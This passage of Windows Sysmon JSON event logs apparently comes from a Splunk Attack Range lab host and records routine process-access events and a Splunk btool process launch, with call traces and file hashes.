C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.391","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1808,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.391\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.391","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1809,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.391\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01C7-5F25-0000-0010A1B50300}\r\nTargetProcessId: 8\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.391","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01C7-5F25-0000-0010A1B50300}","TargetProcessId":"8","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1810,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.400\r\nProcessGuid: {A837DB8D-01C7-5F25-0000-001067B60300}\r\nProcessId: 3720\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  server list kvstore --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {A837DB8D-01C7-5F25-0000-0010A1B50300}\r\nParentProcessId: 8\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list kvstore --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.400","ProcessGuid":"{A837DB8D-01C7-5F25-0000-001067B60300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  server list kvstore --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{A837DB8D-01C7-5F25-0000-0010A1B50300}","ParentProcessId":"8","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list kvstore --no-log","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1811,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.391\r\nSourceProcessGUID: {A837DB8D-01C7-5F25-0000-0010A1B50300}\r\nSourceProcessId: 8\r\nSourceThreadId: 3452\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {A837DB8D-01C7-5F25-0000-001067B60300}\r\nTargetProcessId: 3720\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.391","SourceProcessGUID":"{A837DB8D-01C7-5F25-0000-0010A1B50300}","SourceProcessId":"8","SourceThreadId":"3452","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{A837DB8D-01C7-5F25-0000-001067B60300}","TargetProcessId":"3720","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1812,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.391\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C7-5F25-0000-001067B60300}\r\nTargetProcessId: 3720\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.391","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C7-5F25-0000-001067B60300}","TargetProcessId":"3720","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1813,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.391\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.391","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1814,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.391\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.391","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1815,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.391\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.391","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1816,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.391\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 